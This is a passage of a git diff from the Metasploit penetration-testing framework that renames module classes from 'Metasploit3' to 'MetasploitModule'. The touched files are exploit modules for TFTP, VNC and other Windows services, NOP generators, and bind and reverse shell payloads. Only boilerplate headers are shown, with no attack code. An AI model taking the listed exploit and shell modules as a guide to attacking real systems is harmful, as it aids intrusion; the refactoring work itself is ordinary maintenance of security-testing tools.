b/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP diff --git a/modules/exploits/windows/tftp/opentftp_error_code.rb b/modules/exploits/windows/tftp/opentftp_error_code.rb index 0949f8ff23..fa1734b983 100644 --- a/modules/exploits/windows/tftp/opentftp_error_code.rb +++ b/modules/exploits/windows/tftp/opentftp_error_code.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 2183c12283..57e3bfa02b 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index 119de0ce1a..62659e76db 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 75131b6e09..436e4b922e 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb index 3cbd5bf1d0..b1ac37baa9 100644 --- a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb +++ b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index a02cbb277c..5af0ab3918 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 4a673fd767..3616ae558c 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index a479580f78..aa4f88043f 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb b/modules/exploits/windows/vnc/ultravnc_client.rb index 4fd21103e0..9b513c571a 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb index 2822427e85..6ed96a1fab 100644 --- a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb +++ b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index 26bb1236d2..b632b9c800 100644 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb @@ -6,7 +6,7 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote + class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/vpn/safenet_ike_11.rb b/modules/exploits/windows/vpn/safenet_ike_11.rb index 24c94599c7..d6edf7d1fe 100644 --- a/modules/exploits/windows/vpn/safenet_ike_11.rb +++ b/modules/exploits/windows/vpn/safenet_ike_11.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 71d8a1c447..ca878da289 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::WinRM diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index 4d7028f656..c47f62277d 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index a2ba2e1f56..2470ee3f38 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements simple NOP generator for ARM (little endian) # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index 0498fd6817..272d16448c 100644 --- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -12,7 +12,7 @@ require 'msf/core' # This class implements a "nop" generator for PHP payloads # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 73e0f0f4ed..8517b9dc33 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements simple NOP generator for PowerPC # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index 6227cf4c38..c88aaa81df 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements NOP generator for the SPARC platform # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop # Nop types InsSethi = 0 diff --git a/modules/nops/tty/generic.rb b/modules/nops/tty/generic.rb index 26f9189a55..1e6a2b501e 100644 --- a/modules/nops/tty/generic.rb +++ b/modules/nops/tty/generic.rb @@ -12,7 +12,7 @@ require 'msf/core' # This class implements a "nop" generator for TTY payloads # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb index 765a636309..8af416a2d5 100644 --- a/modules/nops/x64/simple.rb +++ b/modules/nops/x64/simple.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index d45d90434e..609a618615 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -17,7 +17,7 @@ require 'rex/nop/opty2' # ADMmutate and from spoonfu. # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 3607aa361f..5c09d4586d 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -13,7 +13,7 @@ require 'msf/core' # ADMmutate and from spoonfu. # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop SINGLE_BYTE_SLED = { diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb index a1b09fcc1c..7e48e83f2d 100644 --- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 264 diff --git a/modules/payloads/singles/aix/ppc/shell_find_port.rb b/modules/payloads/singles/aix/ppc/shell_find_port.rb index 10f3ca4167..0b7e38ba16 100644 --- a/modules/payloads/singles/aix/ppc/shell_find_port.rb +++ b/modules/payloads/singles/aix/ppc/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 220 diff --git a/modules/payloads/singles/aix/ppc/shell_interact.rb b/modules/payloads/singles/aix/ppc/shell_interact.rb index 24832f647c..ac97edec4e 100644 --- a/modules/payloads/singles/aix/ppc/shell_interact.rb +++ b/modules/payloads/singles/aix/ppc/shell_interact.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 56 diff --git a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb index 44c3fe9367..ef6c85201a 100644 --- a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 204 diff --git a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb index f4f42719c9..06b08fb63e 100644 --- a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 164 diff --git a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb index 1143cf23b8..1df2e6ee8d 100644 --- a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 128 diff --git a/modules/payloads/singles/bsd/x64/exec.rb b/modules/payloads/singles/bsd/x64/exec.rb index 150d96f356..973ae31ab4 100644 --- a/modules/payloads/singles/bsd/x64/exec.rb +++ b/modules/payloads/singles/bsd/x64/exec.rb @@ -15,7 +15,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 31 diff --git a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb index c6a5ff3f38..6c0d2ee0fc 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 90 diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb index 9528c88233..cbfe962089 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 136 diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb index 8d92cadcb6..8bff2170e3 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 88 diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb index 368d6f9666..0c4d3612ff 100644 --- a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 105 diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb index fece7de959..490f67d140 100644 --- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 108 diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb index 98ef6fb778..77b0e61099 100644 --- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb +++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 81 diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb index eee7aebbd9..d95199cebd 100644 --- a/modules/payloads/singles/bsd/x86/exec.rb +++ b/modules/payloads/singles/bsd/x86/exec.rb @@ -15,7 +15,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 24 diff --git a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb index f8352a26de..ee7e1c55e2 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/meterpreter_x86_bsd' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb index 722c4f71f6..73af2e47f9 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_x86_bsd' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb index 51c42e0b2a..5e2b8ba269 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 73 diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb index 364b19f021..91287cd4a0 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 87 diff --git a/modules/payloads/singles/bsd/x86/shell_find_port.rb b/modules/payloads/singles/bsd/x86/shell_find_port.rb index 80f4aa6955..0cb7111680 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 60 diff --git a/modules/payloads/singles/bsd/x86/shell_find_tag.rb b/modules/payloads/singles/bsd/x86/shell_find_tag.rb index 389ff04691..7cec06f54b 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_tag.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_tag.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_tag' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 70 diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb index a1be7400f4..f7f2c2a538 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 64 diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb index 3de4c6b8ba..19d50fe386 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 96 diff --git a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb index 6de81667fc..40f238704a 100644 --- a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 90 diff --git a/modules/payloads/singles/bsdi/x86/shell_find_port.rb b/modules/payloads/singles/bsdi/x86/shell_find_port.rb index 2a1ba296ef..cbe48df2fa 100644 --- a/modules/payloads/singles/bsdi/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsdi/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 77 diff --git a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb index 229632db3b..2fbd74f012 100644 --- a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 77 diff --git a/modules/payloads/singles/cmd/unix/bind_awk.rb b/modules/payloads/singles/cmd/unix/bind_awk.rb index 9d232ba539..5daf081d65 100644 --- a/modules/payloads/singles/cmd/unix/bind_awk.rb +++ b/modules/payloads/singles/cmd/unix/bind_awk.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 96 diff --git a/modules/payloads/singles/cmd/unix/bind_inetd.rb b/modules/payloads/singles/cmd/unix/bind_inetd.rb index bebc37ed4a..ccf344d794 100644 --- a/modules/payloads/singles/cmd/unix/bind_inetd.rb +++ b/modules/payloads/singles/cmd/unix/bind_inetd.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 487 diff --git a/modules/payloads/singles/cmd/unix/bind_lua.rb b/modules/payloads/singles/cmd/unix/bind_lua.rb index 63d63f582a..48f3ea4637 100644 --- a/modules/payloads/singles/cmd/unix/bind_lua.rb +++ b/modules/payloads/singles/cmd/unix/bind_lua.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 223 diff --git a/modules/payloads/singles/cmd/unix/bind_netcat.rb b/modules/payloads/singles/cmd/unix/bind_netcat.rb index be87603bc0..f6fede2db6 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb b/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb index d22c62128f..ec8804a2ab 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 24 diff --git a/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb index aa0255cc18..68e518e90f 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 25 diff --git a/modules/payloads/singles/cmd/unix/bind_nodejs.rb b/modules/payloads/singles/cmd/unix/bind_nodejs.rb index 22e4a5999f..b795bdd184 100644 --- a/modules/payloads/singles/cmd/unix/bind_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/bind_nodejs.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1843 diff --git a/modules/payloads/singles/cmd/unix/bind_perl.rb b/modules/payloads/singles/cmd/unix/bind_perl.rb index 003b4a081e..d169b2c3d1 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 240 diff --git a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb index 01d2798d01..d8d3e52457 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 152 diff --git a/modules/payloads/singles/cmd/unix/bind_ruby.rb b/modules/payloads/singles/cmd/unix/bind_ruby.rb index 790e5bf18b..f445299ee3 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 137 diff --git a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb index 3dc333efc5..7b012a8e01 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 142 diff --git a/modules/payloads/singles/cmd/unix/bind_zsh.rb b/modules/payloads/singles/cmd/unix/bind_zsh.rb index 9772d7a5a8..49389b7186 100644 --- a/modules/payloads/singles/cmd/unix/bind_zsh.rb +++ b/modules/payloads/singles/cmd/unix/bind_zsh.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 112 diff --git a/modules/payloads/singles/cmd/unix/generic.rb b/modules/payloads/singles/cmd/unix/generic.rb index 3b982b201f..870888f0e4 100644 --- a/modules/payloads/singles/cmd/unix/generic.rb +++ b/modules/payloads/singles/cmd/unix/generic.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 8 diff --git a/modules/payloads/singles/cmd/unix/interact.rb b/modules/payloads/singles/cmd/unix/interact.rb index e40b0aad4e..282de3060d 100644 --- a/modules/payloads/singles/cmd/unix/interact.rb +++ b/modules/payloads/singles/cmd/unix/interact.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/cmd/unix/reverse.rb b/modules/payloads/singles/cmd/unix/reverse.rb index 2ef164ebd7..006f6a497f 100644 --- a/modules/payloads/singles/cmd/unix/reverse.rb +++ b/modules/payloads/singles/cmd/unix/reverse.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_double' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 130 diff --git a/modules/payloads/singles/cmd/unix/reverse_awk.rb b/modules/payloads/singles/cmd/unix/reverse_awk.rb index 05402d4153..348126cb55 100644 --- a/modules/payloads/singles/cmd/unix/reverse_awk.rb +++ b/modules/payloads/singles/cmd/unix/reverse_awk.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 110 diff --git 